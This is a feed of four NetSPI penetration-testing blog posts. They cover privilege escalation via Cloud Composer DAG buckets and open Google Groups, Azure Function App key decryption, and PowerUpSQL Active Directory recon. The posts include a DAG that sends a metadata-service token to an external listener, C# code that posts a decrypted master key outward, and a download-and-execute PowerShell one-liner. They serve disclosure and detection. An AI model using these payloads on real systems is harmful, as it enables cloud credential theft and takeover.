Thomas Elling, Author at NetSPI The Proactive Security Solution Wed, 06 Nov 2024 14:41:00 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.1 https://www.netspi.com/wp-content/uploads/2024/03/favicon.png Thomas Elling, Author at NetSPI 32 32 Filling up the DagBag: Privilege Escalation in Google Cloud Composer https://www.netspi.com/blog/technical-blog/cloud-pentesting/privilege-escalation-google-cloud-composer/ Wed, 06 Nov 2024 14:40:59 +0000 https://www.netspi.com/?p=25822 Learn how attackers can escalate privileges in Cloud Composer by exploiting the dedicated Cloud Storage Bucket and the risks of default configurations.

The post Filling up the DagBag: Privilege Escalation in Google Cloud Composer appeared first on NetSPI.

]]>
Cloud Composer is a managed service in Google Cloud Platform that allows users to manage workflows. Cloud Composer is built on Apache Airflow and is integrated closely with multiple GCP services. One key component of the managed aspect of Cloud Composer is the use of Cloud Storage to support the environment’s data.  

Per GCP documentation: “When you create an environment, Cloud Composer creates a Cloud Storage bucket and associates the bucket with your environment… Cloud Composer synchronizes specific folders in your environment’s bucket to Airflow components that run in your environment.” 

This blog will walk through how an attacker can escalate privileges in Cloud Composer by targeting the environment’s dedicated Cloud Storage Bucket for command execution. We will also discuss the impact of using default configurations and how these can be leveraged by an attacker. 

TL;DR 

  • An attacker that has write access to the Cloud Composer environment’s dedicated bucket (pre-provisioned or gained through other means) can gain command execution in the Composer environment. This command execution can be leveraged to access the Composer environment’s attached service account. 
  • The “dags” folder in the Storage Bucket automatically syncs to Composer. A specifically crafted Python DAG can be created to gain command execution in the Composer pipeline. 
  • An attacker ONLY needs write access to the Storage Bucket (pre-provisioned or gained through other means). No permissions on the actual Composer service are needed. 
  • The Composer service uses the Default Compute Engine Service Account by default. In addition, this SA is also granted Editor on the entire project. 
  • NetSPI reported this issue to Google VRP. This resulted in a ticket status of Intended Behavior. 

Environment Bucket and DAGs 

As mentioned before, Composer relies on Cloud Storage for dedicated environment data storage. Multiple folders are created for the environment in the bucket, including the “dags” folder. Apache Airflow workflows are made up of Directed Acyclic Graphs (DAGs). DAGs are defined in Python code and can perform tasks such as ingesting data or sending HTTP requests. These files are stored in the Storage bucket’s “dags” folder. 

Composer automatically syncs the contents of the “dags” folder to Airflow. This is significant as anyone who has write access to this folder can then write their own DAG, upload it to this folder, and have the DAG sync’d to the Airflow environment without ever having access to Composer or Airflow.  

An attacker with write access (pre-provisioned or gained through other means) could leverage the following attack path: 

  1. Create an externally available listening webserver. 
  2. Upload the DAG to the “dags” folder in the Storage Bucket. The DAG file will automatically be synced into Airflow. 
  3. Create a specifically crafted DAG file that is configured to run immediately upon pickup by the Airflow scheduler. The DAG file will query the metadata service for a Service Account token and send that to the externally available webserver. 
  4. Wait for the DAG to be picked up by the scheduler and executed. This does NOT require any access to the Airflow UI and does not require manual triggering. The DAG will run automatically in a default configuration. 
  5. Monitor the listening webserver for a POST request with the Service Account access token. 
  6. Authenticate with the access token. 

Proof of Concept 

Assume a GCP project (cc-demo) has been created with all default settings. This includes enabling the Compute service and the Default Compute Engine Service Account that has Editor on the project.

The Cloud Composer service has also been enabled and an environment (composer-demo) with default settings has been created via the UI. Note that the environment uses the Default Compute Engine Service Account by default. 

A dedicated Cloud Storage bucket has also been created for the new Composer environment. All the documented Airflow folders have been automatically created. 

The attacker (demo-user) has write access to all buckets in the project, including the dedicated Composer bucket. 

An example Python DAG like below can be used to gain command execution in the Composer environment. There are a few important sections in the DAG to highlight: 

  • the start_date has been set to a day ago 
  • catchup is True 
  • the BashOperator has been used to query the metadata service for a token which is then sent outbound to a listening web server 

Note that this is just a single example of what could be done with write access.

"""netspi test""" 
import airflow 
from airflow import DAG 
from airflow.operators.bash_operator import BashOperator 
from datetime import timedelta 

default_args = { 
    'start_date': airflow.utils.dates.days_ago(1), 
    'retries': 1, 
    'retry_delay': timedelta(minutes=1), 
    'depends_on_past': True, 
} 

dag = DAG( 
    'netspi_dag_test', 
    default_args=default_args, 
    description='netspi', 
    # schedule_interval=None, 
    max_active_runs=1, 
    catchup=True, 
    dagrun_timeout=timedelta(minutes=5)) 

# priority_weight has type int in Airflow DB, uses the maximum. 
t1 = BashOperator( 
    task_id='netspi_dag', 
    bash_command='ev=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token -H "Metadata-Flavor: Google");curl -X POST -H "Content-Type: application/json" -d "$ev" https://[REDACTED]/test', 
    dag=dag, 
    depends_on_past=False, 
    priority_weight=2**31 - 1, 
    do_xcom_push=False) 

The demo-user can then upload the example Python DAG file to the dags folder.

The DAG file will eventually sync to Airflow, get picked up by the scheduler, and run automatically. A request will pop up in the web server logs or Burp Suite Pro’s Collaborator. 

The token can then be used with the gcloud cli or the REST APIs directly. 

Prevention and Remediation 

Google VRP classified this issue as Intended Behavior. Per Google documentation, IAM permissions to the environment’s cloud storage bucket is the responsibility of the customer. This documentation was updated to more clearly outline the danger of gaining write access to this bucket. 

Cloud Composer’s default behavior of assigning the Default Compute Engine Service Account (that is granted Editor on the project by default) has also been documented here

NetSPI recommends reviewing all pertinent Google documentation on securing Cloud Composer. Specifically for this attack vector: 

  • Include the services used to support Cloud Composer in the overall threat model, as the security of those services will affect Composer. 
  • Follow the principle of least privilege when granting permissions to Cloud Storage in a project that uses Cloud Composer. Review all identities that have write access to the environment’s bucket and remove any identities with excessive access. 
  • Follow the principle of least privilege when assigning a service account to Cloud Composer. Avoid using the Default Compute Engine Service Account due to its excessive permissions. 

Detection 

The following may be helpful for organizations that want to actively detect on the attack vector described. Note that these opportunities are meant to provide a starting point and may not work as written for every organization’s use case. 

Data Source: Cloud Composer Streaming Logs
Detection Strategy: Behavior
Detection Concept:  Detect on new python files being created in the “dags” folder in the storage bucket. Alternatively, when a new DAG is synced from a bucket to a composer using gcs-syncd logs.
Detection Reasoning: A user that has write access to the bucket could gain command execution in the Composer environment via rogue DAG files.
Known Detection Consideration:  New DAGs will be created as part of legitimate activity and exceptions may need to be added.
Example Instructions: 
Refer to https://cloud.google.com/composer/docs/concepts/logs#streaming. 

  1. Browse to Log Explorer 
  2. Enter the query below and substitute the appropriate values 
  3. Select “gcs-syncd”, “airflow-scheduler”, or “airflow-worker” to review the logs 
resource.type="cloud_composer_environment" 
resource.labels.location="<ENTER_LOCATION_HERE>" 
resource.labels.environment_name="<ENTER_COMPOSER_RESOURCE_NAME>" 

gcs-syncd example

airflow-worker example 

Google Bug Hunters VRP Timeline 

NetSPI worked with Google on coordinated disclosure. 

  • 07/22/2024 – Report submitted 
  • 07/23/2024 – Report triaged and assigned 
  • 07/25/2024 – Status changed to In Progress (Accepted) with type Bug 
  • 08/10/2024 – Status changed to Won’t Fix (Intended Behavior) 
  • 08/13/2024 – Google provides additional context 
  • 09/02/2024 – Coordinated Disclosure process begins 
  • 09/30/2024 – Coordinated Disclosure process ends 

Learn more about escalating privileges in Google Cloud: 
Escalating Privileges in Google Cloud via Open Groups 

The post Filling up the DagBag: Privilege Escalation in Google Cloud Composer appeared first on NetSPI.

]]>
Escalating Privileges in Google Cloud via Open Groups  https://www.netspi.com/blog/technical-blog/cloud-pentesting/escalating-privileges-in-google-cloud-via-open-groups/ Wed, 31 Jul 2024 14:00:00 +0000 https://www.netspi.com/?p=25078 Learn how attackers can abuse Open groups to potentially escalate privileges in Google Cloud and how to detect these attack paths.

The post Escalating Privileges in Google Cloud via Open Groups  appeared first on NetSPI.

]]>
Per GCP IAM documentation, Google Groups are valid principals for IAM policy bindings in Google Cloud. Google also recommends using Groups when granting roles in GCP, as opposed to users. Groups can include groups outside of organizations like devs@googlegroups.com or groups in an Organization like admins@yourorg.com. Google Groups can be managed via https://groups.google.com/ and optionally through the Google Cloud Console.

Google Groups can be configured with various access settings at both the specific group and organization level. One important access setting is “Who can join group”.  Most organizations will have anonymous internet access disabled by default, which leaves three common organization level settings: Only invited users, Anyone in the organization can ask, and Anyone in the organization can join.

This blog will detail how an attacker can escalate their privileges in Google Cloud by leveraging weak group join settings for groups that have been granted roles in GCP. Opportunities for Hunting and Detection are provided towards the end of the blog.

TL;DR

  • A user that is a member of the organization can potentially escalate their privileges into Google Cloud if:
    • A Google Group has been specified as a principal member in an IAM policy AND
    • the Google Group has been configured with open access permissions that allow any member of the organization to join the group.
  • Google Groups created via the main Groups console can be granted permissions within Google Cloud IAM Policy, even when the group has been configured with “Entire organization – can join group” access settings.
  • There does not appear to be any explicit, default guardrails in place to prevent administrators from assigning roles in GCP to Groups with open join settings.
  • This was reported to Google as a potential Privilege Escalation vector via Bug Hunters VRP. The report resulted in a classification of Type “Bug” and a Status of “Won’t Fix (Intended Behavior)”.

Previous Research

Finding vulnerable Groups

As noted in the TL;DR, we need to find open groups that also have been granted roles in Google Cloud. This process is made a lot easier if you already have read access to list IAM Policy, so that you can target only the groups that actually have permissions. Without this extra information, you will be stuck with attempting to list and check every group.

From an offensive perspective, the main Google Groups console is probably the easiest way to quickly identify open groups. A member user, Developer Tools, and a little background research are all that is needed to get started.

Browsing to the Google Groups page with browser Dev Tools open shows requests related to a batchexecute endpoint.

Decoded URL
https://groups.google.com/u/2/_/GroupsFrontendUi/data/batchexecute?rpcids=rCA4W&source-path=/u/2/recent…

Decoded POST body
f.req=[[["rCA4W","[]",null,"generic"]]]…

Response body
)]}'

104
[["wrb.fr","rCA4W","[]",null,null,null,"generic"],…

Ryan Kovatch’s blog does a great job of explaining the format of the requests and responses for this endpoint. The main takeaway here is that we want to identify the particular rpcid that returns group settings information. This can be identified by browsing to the All Groups section and paginating through as many pages as possible to view every group in the organization. A batchexecute request containing the zx9ptd rpcid should be present for every group listed.

Decoded URL
https://groups.google.com/u/2/_/GroupsFrontendUi/data/batchexecute?rpcids=zx9ptd&source-path=/u/2/all-groups&…

Decoded POST body
f.req=[[["zx9ptd","[\"demo-open-join@thisisnotarealorg.com\"]",null,"generic"]]]…

Response body
)]}'

192
[["wrb.fr","zx9ptd","[[\"110157945035653151646\",\"demo-open-join@thisisnotarealorg.com\"],[true,false,true],0]",null,null,null,"generic"],…

This request looks promising and the rpcid can be looked up by doing a quick search in the Dev Tools console.

…
_.gBa = new _.Oe("zx9ptd",_.fu,_.hu,[{
    key: _.Cj,
    value: !0
}, {
    key: _.Ej,
    value: "/GroupsFrontendService.GetJoinPermissions"
}]);
…

Looking back at the responses for the zx9ptd request, the access settings of the Group can be determined by comparing an open group vs a closed group. The open group contains the following highlighted string in the response. This can then be used to identify open groups at scale by searching for a common group keyword and then paging through the groups. This string can then be searched via the Browser Developer Tools to find open groups.

Entire organization – can join group

…,\"demo-open-join@thisisnotarealorg.com\"],[true,false,true],0]"…

Entire organization – can ask to join group

…\"test1@thisisnotarealorg.com\"],[false,true,true],0]"…

Invited users – can join group

…\"test2@thisisnotarealorg.com\"],[false,false,true],0]"…

While extremely rudimentary, this method can work at scale when you have thousands of groups to review. Manual checks can also be done easily by checking for a Join icon when browsing through the list of groups. A group with open join permissions will look like below.

Escalating into Google Cloud

The following example assumes that the demo-user is a normal member organization user with no permissions in Google Cloud. This is confirmed by browsing to the Cloud Console and attempting to list Projects in the Project chooser.

The demo-open-join Group does have permissions in Google Cloud and has been previously configured with open join settings (see the last screenshot in the previous section). This group is a standard group created via the Groups UI and has been granted the Storage Admin Role on the entire prj-demo project in GCP.

The demo-user can join the demo-open-join group by clicking into the group’s settings and clicking on the “Join group” button. The normal member user has successfully joined the group.

The demo-user can then refresh their session to the Cloud Console after a few minutes and will see a new project. Digging further into the console, the user will also be able to see buckets. Since the Storage Admin role has been granted to the demo-open-join group, any user in this group inherits these permissions.

This is a very simple example, but it demonstrates the risk around groups with open join permissions when they are granted roles in Google Cloud. Not every scenario will be this straightforward and impact depends entirely on the role and the scope of the permissions granted to the group.

Prevention and Remediation

The best way to prevent accidental role grants to open join groups is to always validate the group’s access settings and members before making a role assignment. NetSPI was able to grant roles in GCP to a group with open join permissions (“Entire organization – can join group”). The test Organization was using default configurations and there were no explicit guardrails in place that prevented this. Google does support Security Groups, which have some additional protections in place, but also allow open join permissions.

Google does provide some Group specific guardrails around Group visibility. Hiding certain groups from general members could be an effective way to prevent users from enumerating sensitive groups.

General recommendations for Groups can be found here. Google Cloud also provides additional features for controlling IAM permissions via IAM Deny policies that may be useful for your organization.

While this issue has been classified as Intended Behavior, there is a risk for customer misconfiguration. Google’s Security Command Center in GCP has a check (Open group IAM member) that can find these scenarios. Google’s recommendations for remediating the issue can be found here.

Hunting and Detection

The following may be helpful to organizations that want to actively search or detect on Open join groups. Note that these opportunities are meant to provide a starting point and may not work as written for every organization’s use case. At a high level, the detection below will alert to existing open groups in the environment while the hunting opportunities offer a more broad approach using IAM and Group metadata.

Detection Opportunity #1

Data Source: IAM Policy bindings creation
Detection Strategy: Behavior
Detection Concept: Detect when an IAM policy is created where the principal is an open group. The finding OPEN_GROUP_IAM_MEMBER exists in Security Command Center for this detection opportunity.

state="ACTIVE" AND NOT mute="MUTED" AND category="OPEN_GROUP_IAM_MEMBER"

Detection Reasoning: A member user of the Organization could join the open group and inherit any permissions granted to the group.
Known Detection Consideration: Detection relies on the cadence of scanning in Security Command Center.

Hunting Opportunity #1 – Identify permissions for any groups in GCP

Data Source: IAM Policy Metadata
Detection Strategy: Behavior
Hunting Concept: Review all IAM Policies where the principal is a group using Asset Inventory. Will include ALL groups. This data should be cross-referenced with Hunting Opp #2.
Gcloud CLI command

gcloud asset search-all-iam-policies \
    --scope='...' \
    --query='memberTypes:group'

Console command

Hunting Reasoning: A member user of the Organization could join the open group and inherit any permissions granted to the group.

Hunting Opportunity #2 – Identify any open groups

Data Source: Group Metadata
Detection Strategy: Behavior
Hunting Concept: Review all groups that have open join access, even those that are not assigned permissions in GCP.

  1. Go to the Groups dashboard in the Admin console.
  2. Click the Manage Columns option.
  3. Add a new column “Who can join the group”.
  4. Click Save.
  5. Review this column for the setting “Anyone in the organization can join”.

Hunting Reasoning: A member user of the Organization could join the open group and inherit any permissions granted to the group.

Coordinated Disclosure Timeline

NetSPI worked with Google on coordinated disclosure.

  • 12/11/2023 – Report submitted
  • 12/11/2023 – Report triaged and assigned
  • 12/12/2023 – Status changed to Won’t Fix (Infeasible)
  • 12/14/2023 – Status changed to Won’t Fix (Intended Behavior)
  • 12/28/2023 – Status changed to Assigned (reopened)
  • 01/03/2024 – Status changed to Won’t Fix (Intended Behavior)
  • 01/16/2024 – Status changed to In Progress (Accepted) (reopened). Type changed to Bug.
  • 01/18/2024 – Status changed to Won’t Fix (Intended Behavior)
  • 01/21/2024 – Coordinated Disclosure process begins
  • 03/15/2024 – Coordinated Disclosure process completed

Thanks to Karl Fosaaen, Nick Lynch, and Ben Lister for their review.

The post Escalating Privileges in Google Cloud via Open Groups  appeared first on NetSPI.

]]>
What the Function: Decrypting Azure Function App Keys  https://www.netspi.com/blog/technical-blog/cloud-pentesting/what-the-function-decrypting-azure-function-app-keys/ Sat, 12 Aug 2023 13:30:00 +0000 https://www.netspi.com/what-the-function-decrypting-azure-function-app-keys/ When deploying an Azure Function App, access to supporting Storage Accounts can lead to disclosure of source code, command execution in the app, and decryption of the app’s Access Keys.

The post What the Function: Decrypting Azure Function App Keys  appeared first on NetSPI.

]]>
When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.

Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.  

The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account. 

TLDR; 

  • Function App Access Keys can be stored in Storage Account containers in an encrypted format 
  • Access Keys can be decrypted within the Function App container AND offline 
  • Works with Windows or Linux, with any runtime stack 
  • Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json). 

Previous Research 

Requirements 

Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. Extensive research has already been done for attacking Functions directly and via the corresponding Storage Accounts for Functions. This blog will focus specifically on key decryption for Function takeover. 

Required Permissions 

  • Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”) 
  • Permission to write to Azure File Shares hosting Function code
Screenshot of Storage Accounts associated with a Function App

The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.

{ 
  "masterKey": { 
    "name": "master", 
    "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA", 
    "encrypted": true 
  }, 
  "functionKeys": [ 
    { 
      "name": "default", 
      "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q", 
      "encrypted": true 
    } 
  ], 
  "systemKeys": [],
  "hostName": "thisisafakefunctionappprobably.azurewebsites.net",
  "instanceId": "dc[TRUNCATED]c3",
  "source": "runtime",
  "decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"
}

The code for the corresponding Function App is stored in Azure File Shares. For what it’s worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the “encrypted” parameter to false, to inject their own cleartext function keys into the Function App (see Rogier Dijkman’s research). The directory structure for a Windows ASP.NET Function App (thisisnotrealprobably) typically uses the following structure: 

A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share. 

The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable. 

Decryption in the Function container 

Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.  

An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering. 

The sample code below can be modified to decrypt the key and then send the key to a publicly available listener. 

#r "Newtonsoft.Json" 

using Microsoft.AspNetCore.DataProtection; 
using Microsoft.Azure.Web.DataProtection; 
using System.Net.Http; 
using System.Text; 
using System.Net; 
using Microsoft.AspNetCore.Mvc; 
using Microsoft.Extensions.Primitives; 
using Newtonsoft.Json; 

private static HttpClient httpClient = new HttpClient(); 

public static async Task<IActionResult> Run(HttpRequest req, ILogger log) 
{ 
    log.LogInformation("C# HTTP trigger function processed a request."); 

    DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter(); 
    string keyname = "master"; 
    string encval = "Cf[TRUNCATED]NQ"; 
    var ikey = new Key(keyname, encval, true); 

    if (ikey.IsEncrypted) 
    { 
        ikey = converter.ReadValue(ikey); 
    } 
    // log.LogInformation(ikey.Value); 
    string url = "https://[TRUNCATED]"; 
    string body = $"{{"name":"{keyname}", "value":"{ikey.Value}"}}"; 
    var response = await httpClient.PostAsync(url, new StringContent(body.ToString())); 

    string name = req.Query["name"]; 

    string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); 
    dynamic data = JsonConvert.DeserializeObject(requestBody); 
    name = name ?? data?.name; 

    string responseMessage = string.IsNullOrEmpty(name) 
        ? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 
                : $"Hello, {name}. This HTTP triggered function executed successfully."; 

            return new OkObjectResult(responseMessage); 
} 

class DataProtectionKeyValueConverter 
{ 
    private readonly IDataProtector _dataProtector; 
 
    public DataProtectionKeyValueConverter() 
    { 
        var provider = DataProtectionProvider.CreateAzureDataProtector(); 
        _dataProtector = provider.CreateProtector("function-secrets"); 
    } 

    public Key ReadValue(Key key) 
    { 
        var resultKey = new Key(key.Name, null, false); 
        resultKey.Value = _dataProtector.Unprotect(key.Value); 
        return resultKey; 
    } 
} 

class Key 
{ 
    public Key(){} 

    public Key(string name, string value, bool encrypted) 
    { 
        Name = name; 
        Value = value; 
        IsEncrypted = encrypted; 
    } 

    [JsonProperty(PropertyName = "name")] 
    public string Name { get; set; } 

    [JsonProperty(PropertyName = "value")] 
    public string Value { get; set; } 

    [JsonProperty(PropertyName = "encrypted")] 
    public bool IsEncrypted { get; set; }
}

Triggering via browser: 

Screenshot of triggering via browser saying This HTTP triggered function executed successfully. Pass a name in the query body for a personalized response.

Burp Collaborator:

Screenshot of Burp collaborator.

Master key:

Screenshot of Master key.

Local Decryption 

Decryption can also be done outside of the function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally and that is access to the decryption key.

The code makes multiple references to the location of default keys:

The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.  

One thing to keep in mind is that the environment variable will be different depending on the underlying Function operating system. Linux based containers will use AzureWebEncryptionKey while Windows will use MACHINEKEY_DecryptionKey. One of those environment variables will be available via Function App Trigger Code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. Example below is for PowerShell in a Windows environment: 

$env:MACHINEKEY_DecryptionKey

This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint. 

The local decryption can be done once the encrypted key data and the decryption keys are obtained. After pulling down the GitHub repo and getting it setup in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs. The following edits can be made.

// Copyright (c) .NET Foundation. All rights reserved. 
// Licensed under the MIT License. See License.txt in the project root for license information. 

using System; 
using Microsoft.Azure.Web.DataProtection; 
using Microsoft.AspNetCore.DataProtection; 
using Xunit; 
using System.Diagnostics; 
using System.IO; 

namespace Microsoft.Azure.Web.DataProtection.Tests 
{ 
    public class DataProtectionProviderTests 
    { 
        [Fact] 
        public void EncryptedValue_CanBeDecrypted()  
        { 
            using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B")) 
            { 
                var provider = DataProtectionProvider.CreateAzureDataProtector(null, true); 

                var protector = provider.CreateProtector("function-secrets"); 

                string expected = "test string"; 

                // string encrypted = protector.Protect(expected); 
                string encrypted = "Cf[TRUNCATED]8w"; 

                string result = protector.Unprotect(encrypted); 

                File.WriteAllText("test.txt", result); 
                Assert.Equal(expected, result); 
            } 
        } 
    } 
} 

Run the test case after replacing the variable values with the two required items. The test will fail, but the decrypted master key will be returned in test.txt! This can then be used to query the Function App administrative REST APIs. 

Tool Overview 

NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. This tool requires write access to the corresponding File Share where the Function code is stored and supports .NET, PSCore, Python, and Node. Given a Storage Account that is connected to a Function App, the tool will attempt to create a HTTP Trigger (function-specific API key required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to cleanup any uploaded code once the key and tokens are received.  

Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.

Screenshot of welcome screen to the NetSPI "FuncoPop" app (Function App Key Decryption).

See the GitHub link https://github.com/NetSPI/FuncoPop for more info. 

Prevention and Mitigation 

There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes: 

  1. Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.
  2. Rotating Shared Access Keys. 
  3. Limiting the creation of privileged, long lasting SAS tokens. 
  4. Use the principle of least privilege. Only grant the least privileges necessary to narrow scopes. Be aware of any roles that grant write access to Storage Accounts (including those roles with list key permissions!) 
  5. Identify Function Apps that use Storage Accounts and ensure that these resources are placed in dedicated Resource Groups.
  6. Avoid using shared Storage Accounts for multiple Functions. 
  7. Ensure that Diagnostic Settings are in place to collect audit and data plane logs. 

More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations. 

MSRC Timeline 

As part of our standard Azure research process, we ran our findings by MSRC before publishing anything. 

02/08/2023 – Initial report created
02/13/2023 – Case closed as expected and documented behavior
03/08/2023 – Second report created
04/25/2023 – MSRC confirms original assessment as expected and documented behavior 
08/12/2023 – DefCon Cloud Village presentation 

Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection. 

The post What the Function: Decrypting Azure Function App Keys  appeared first on NetSPI.

]]>
Dumping Active Directory Domain Info – with PowerUpSQL! https://www.netspi.com/blog/technical-blog/network-pentesting/dumping-active-directory-domain-info-with-powerupsql/ Thu, 31 May 2018 07:00:56 +0000 https://www.netspi.com/dumping-active-directory-domain-info-with-powerupsql/ This blog walks through some new Active Directory recon functions in PowerUpSQL. The PowerUpSQL functions use the OLE DB ADSI provider to query Active Directory for domain users, computers, and other configuration information through SQL Server queries.

The post Dumping Active Directory Domain Info – with PowerUpSQL! appeared first on NetSPI.

]]>
This blog walks through how to use the OLE DB ADSI provider in SQL Server to query Active Directory for information.  I’ll also share a number of new PowerUpSQL functions that can be used for automating common AD recon activities through SQL Server. Hopefully this will be useful to red teamers, pentesters, and database enthusiasts. Thanks to Scott Sutherland (@_nullbind) for his work on both the AD recon functions and PowerUpSQL!

The T-SQL

The T-SQL below shows how the ADSI provider is used with OPENQUERY and OPENROWSET to query for Active Directory information. First, a SQL Server link needs to be created for the ADSI provider. A link is created with the name “ADSI”.

-- Create SQL Server link to ADSI
IF (SELECT count(*) FROM master..sysservers WHERE srvname = 'ADSI') = 0
EXEC master.dbo.sp_addlinkedserver @server = N'ADSI',
@srvproduct=N'Active Directory Service Interfaces',
@provider=N'ADSDSOObject',
@datasrc=N'adsdatasource'
ELSE
SELECT 'The target SQL Server link already exists.'
Img Afdf C E

If using OPENQUERY, associate the link with the current authentication context. A username and password can also be specified here. Then run the example query.

Note: The LDAP “path” should be set to the target domain.

-- Define authentication context - OpenQuery
EXEC sp_addlinkedsrvlogin
@rmtsrvname=N'ADSI',
@useself=N'True',
@locallogin=NULL,
@rmtuser=NULL,
@rmtpassword=NULL
GO
-- Use openquery
SELECT *
FROM OPENQUERY([ADSI],'<LDAP://path>;(&(objectCategory=Person)(objectClass=user));name, adspath;subtree')
Img Afdf E D

If using OPENROWSET, enable ad hoc queries. Then run the example query with a specified username and password or default authentication.

Note: The LDAP “path” should be set to the target domain.

-- Enable 'Show Advanced Options'
EXEC sp_configure 'Show Advanced Options', 1
RECONFIGURE
GO

-- Enable 'Ad Hoc Distributed Queries'
EXEC sp_configure 'Ad Hoc Distributed Queries', 1
RECONFIGURE
GO

-- Run with openrowset
SELECT *
FROM OPENROWSET('ADSDSOOBJECT','adsdatasource',
'<LDAP://path>;(&(objectCategory=Person)(objectClass=user));name, adspath;subtree')
Img Afdf Cc C

Loading PowerUpSQL

PowerUpSQL can be loaded quite a few different ways in PowerShell. Below is a basic example showing how to download and import the module from GitHub.

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

Newly Added Active Directory Recon Functions

Now that you have PowerUpSQL loaded, you can use the new commands to execute queries against the domain.  However, please be aware that all commands require sysadmin privileges.

Function NameDescription
Get-SQLDomainAccountPolicyProvides the domain account policy for the SQL Server’s domain.
Get-SQLDomainComputerProvides a list of the domain computers on the SQL Server’s domain.
Get-SQLDomainControllerProvides a list of the domain controllers on the SQL Server’s domain.
Get-SQLDomainExploitableSystemProvides a list of the potential exploitable computers on the SQL Server’s domain based on Operating System version information.
Get-SQLDomainGroupProvides a list of the domain groups on the SQL Server’s domain.
Get-SQLDomainGroupMemberProvides a list of the domain group members on the SQL Server’s domain.
Get-SQLDomainObjectCan be used to execute arbitrary LDAP queries on the SQL Server’s domain.
Get-SQLDomainOuProvides a list of the organization units on the SQL Server’s domain.
Get-SQLDomainPasswordsLAPSProvides a list of the local administrator password on the SQL Server’s domain. This typically required Domain Admin privileges.
Get-SQLDomainSiteProvides a list of sites.
Get-SQLDomainSubnetProvides a list of subnets.
Get-SQLDomainTrustProvides a list of domain trusts.
Get-SQLDomainUserProvides a list of the domain users on the SQL Server’s domain.
Get-SQLDomainUser -UserState DisabledProvides a list of the disabled domain users on the SQL Server’s domain.
Get-SQLDomainUser -UserState EnabledProvides a list of the enabled domain users on the SQL Server’s domain.
Get-SQLDomainUser -UserState LockedProvides a list of the locked domain users on the SQL Server’s domain.
Get-SQLDomainUser -UserState PreAuthNotRequiredProvides a list of the domain users that do not require Kerberos preauthentication on the SQL Server’s domain.
Get-SQLDomainUser -UserState PwLastSet 90This parameter can be used to list users that have not changed their password in the last 90 days. Any number can be provided though.
Get-SQLDomainUser -UserState PwNeverExpiresProvides a list of the domain users that never expire on the SQL Server’s domain.
Get-SQLDomainUser -UserState PwNotRequiredProvides a list of the domain users with the PASSWD_NOTREQD flag set on the SQL Server’s domain.
Get-SQLDomainUser -UserState PwStoredRevEncProvides a list of the domain users storing their password using reversible encryption on the SQL Server’s domain.
Get-SQLDomainUser -UserState SmartCardRequiredProvides a list of the domain users that require smart card for interactive login on the SQL Server’s domain.
Get-SQLDomainUser -UserState TrustedForDelegationProvides a list of the domain users trusted for delegation on the SQL Server’s domain.
Get-SQLDomainUser -UserState TrustedToAuthForDelegationProvides a list of the domain users trusted to authenticate for delegation on the SQL Server’s domain.

Dumping Domain Users Examples

This example shows how to gather a list of enabled domain users using a Linked Server via OPENQUERY.

Get-SQLDomainUser -Instance MSSQLSRV04\SQLSERVER2014 -Verbose -UserState Enabled
Img Afdfb A Ffee

Alternatively, the command can be run using ad hoc queries via OPENROWSET as shown below.  Its nothing crazy, but it does provide a few options for avoiding detection if the DBAs are auditing for linked server creation, but not ad hoc queries in the target environment.

Get-SQLDomainUser -Instance MSSQLSRV04\SQLSERVER2014 -Verbose -UserState Enabled -UseAdHoc
Img Afdfb D Caec

